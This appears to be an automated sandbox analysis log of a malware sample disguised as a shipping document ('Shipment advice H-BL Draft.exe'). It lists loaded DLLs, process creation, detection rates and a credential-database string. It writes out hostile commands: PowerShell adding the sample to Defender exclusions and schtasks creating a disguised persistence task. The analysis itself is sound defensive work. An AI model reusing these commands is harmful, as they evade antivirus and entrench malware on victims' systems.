                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1156:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFBC0.tmpJump to behavior
                    Source: Shipment advice H-BL Draft.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Shipment advice H-BL Draft.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000305C000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000306B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Shipment advice H-BL Draft.exeVirustotal: Detection: 63%
                    Source: Shipment advice H-BL Draft.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile read: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: vcruntime140_clr0400.dll
